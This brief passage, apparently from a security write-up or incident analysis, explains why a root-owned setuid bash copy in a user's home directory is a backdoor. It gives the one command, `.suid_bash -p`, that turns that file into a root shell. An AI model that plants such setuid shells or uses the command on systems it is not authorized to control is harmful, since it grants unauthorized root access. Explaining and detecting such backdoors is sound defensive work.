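The setuid check is the one that matters most: a root-owned file with the `s` bit in a user's home is not something package management puts there, and `.suid_bash -p` (bash keeps the effective uid only with `-p`) is the whole root path on this box.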